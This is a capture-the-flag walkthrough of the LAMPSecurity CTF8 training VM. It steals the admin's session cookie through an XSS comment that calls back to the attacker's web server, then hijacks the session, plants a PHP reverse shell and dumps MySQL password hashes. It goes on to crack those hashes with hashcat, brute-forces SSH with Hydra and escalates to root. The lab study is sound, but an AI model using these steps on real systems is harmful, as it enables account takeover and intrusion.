Coffee Difficulty Rating:

Author Description

The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products.

Author: madirish2600

Download: VulnHub

Enumeration

nmap -v -p 1-65535 -sV -O -sT 192.168.30.135
Dislcaimer: Multiple Entry Points

The LAMPSecurity series is not particularly challenging, for each VM in the series I've targeted the web application as the entry point.

Host Service Enumeration

Port Service Version Detection

TCP: 21

FTP

vsftpd 2.0.5

TCP: 22

SSH

OpenSSH 4.3 (protocol 2.0)

TCP: 25

SMTP

Sendmail

TCP: 80

HTTP

Apache httpd 2.2.3 ((CentOS))

TCP: 110

POP3

Dovecot pop3d

TCP: 111

rpcbind

N/A

TCP: 139

Netbios

Samba smbd 3.X (workgroup: WORKGROUP)

TCP: 143

IMAP

Dovecot imapd

TCP: 443

HTTPS

Apache httpd 2.2.3 ((CentOS))

TCP: 445

Netbios

Samba smbd 3.X (workgroup: WORKGROUP)

TCP: 938

TCP

N/A

TCP: 993

IMAP SSL

Dovecot imapd

TCP: 995

POP3 SSL

Dovecot pop3d

TCP: 3306

MySQL

MySQL (unauthorized)

TCP: 5801-5804

VNC HTTP

RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5901)

TCP: 5901-5904

VNC

VNC (protocol 3.8)

TCP: 6001-6004

X11

X11

Inspection of the Web Application

As with the previous CTF series VM’s, I’ve chosen to ignore other entry points and focus on the web application is used for the entry point.

Inspection of the web application revealed it was vulnerable to XSS (Cross Site Scripting):

XSS

Confirmed:

XSS Alert

XSS Session ID Hijacking

From insepecting the web application it appeared Barbara was an admin, a guess based on her user activity. A XSS comment was placed on one of the pages Barbara had created and an email was sent to Barbara instructing her to view the page.

The XXS script will execute and attempt to contact a web server on the attacking machine, the url will disclose Barbara’s session ID.

Once the ID has been obtained, Cookie Manager+ Firefox plugin or Burp Suite is used to manipulate the stored cookie and replace the session ID with Barbara’s, hijacking Barbara’s session.

XSS Comment

Joomla required a user to preview a comment before saving, in this case the XSS executes and Joomla fails to save the comment. To evade this behavior, a normal comment was posted, then edited to include the XSS snipet.

XSS Cookie Hijacking

HTTP Server

A HTTP server was setup on attacking machine: python -m SimpleHTTPServer 80

Email Barbara (victim)

XSS Link Email Victim

After a couple of minutes the following appeared in the web server logs:

192.168.221.135 - - [05/05/2014 10:54:28] "GET
/?SESS2130d5ef479afc30ab5b3f3d50bbfc5e=9ehlga5fhnh8o81om1aq5so040;%20has_js=1
HTTP/1.1" 301 -

Barbaras Session ID: 9ehlga5fhnh8o81om1aq5so040

Swapped Session ID Burp Suite

Burp Swap Session ID

Cookie Manager+ and / or Tamper Data can also be used for this purpose.

Successfuly logged in as Barbara:

Session Hijacked

Reverse Shell

A reverse shell was injected into a new page using Barbara’s admin account:

php reverse shell

Drupal settings.php

The following disclosed settings.php file for Drupal existed.

Drupal Settings.php

File path: /var/www/html/drupal/sites/default/settings.php

The file contained the root account credentials for mysql.

*/

$db_url = 'mysqli://root:[email protected]/drupal';

$db_prefix = '';

The following SQL was used to disclose the password hashes:

/bin/sh -i

sh: no job control in this shell

sh-3.2$ mysql -u root -p drupal
Enter password: JumpUpAndDown
select name,pass from users;
/q
admin     49265c16d1dff8acef3499bd889299d6
Barbara     bed128365216c019988915ed3add75fb
Jim     2a5de0f53b1317f7e36afcdb6b5202a4
Steve     08d15a4aef553492d8971cdd5198f314
Sherry     c3319d1016a802db86653bcfab871f4f
Gene     9b9e4bbd988954028a44710a50982576
Harvey     7d29975b78825ea7c27f5c0281ea2fa4
John     518462cd3292a67c755521c1fb50c909
Johnathan     6dc523ebd2379d96cc0af32e2d224db0
Susan     0d42223010b69cab86634bc359ed870b
Dan     8f75ad3f04fc42f07c95e2f3d0ec3503
George     ed2b1f468c5f915f3f1cf75d7068baae
Jeff     ca594f739e257245f2be69eb546c1c04
Stacey     85aca385eb555fb6a36a62915ddd8bc7
Juan     573152cc51de19df50e90b0e557db7fe
Michael     c7a4476fc64b75ead800da9ea2b7d072
Jerome     42248d4cb640a3fb5836571e254aee2b
Tom     971dcf53e88e9268714d9d504753d347
Xavier     3005d829eb819341357bfddf541c175b
Sally     7a1c07ff60f9c07ffe8da34ecbf4edc2
Latte     42a7ccabfaea30678d6f1b80876773ef

Hashcat MD5 cracking

Hashcat wased to crack the hashes offline:

[root:~]# hashcat --username -m 0 -a 0 ctf8-hashes.txt
/usr/share/wordlists/rockyou.txt

Hydra SSH Brute Force

Hyrda was used to brute force SSH using the previously cracked password hashes:

[DATA] attacking service ssh on port 22

[22][ssh] host: 192.168.221.135   login: jharraway   password: letmein!
[22][ssh] host: 192.168.221.135   login: spinkton   password: football123
[22][ssh] host: 192.168.221.135   login: bdio   password: passw0rd
[STATUS] 167.00 tries/min, 167 tries in 00:01h, 53 todo in 00:01h, 5 active

SSH Account Compromise

[root:~]# ssh [email protected]

Welcome to LAMPSecurity Research SSH access!

#flag#5e937c51b852e1ee90d42ddb5ccb8997

Unauthorized access is expected...

[email protected]'s password:
Last login: Thu Mar 27 12:48:29 2014 from 192.168.56.1
#flag#motd-flag

Local Privilege Escalation

[[email protected] ~]$ sudo -s

Password:

[[email protected] ~]# id

uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
context=user_u:system_r:unconfined_t

Thanks for the VM :)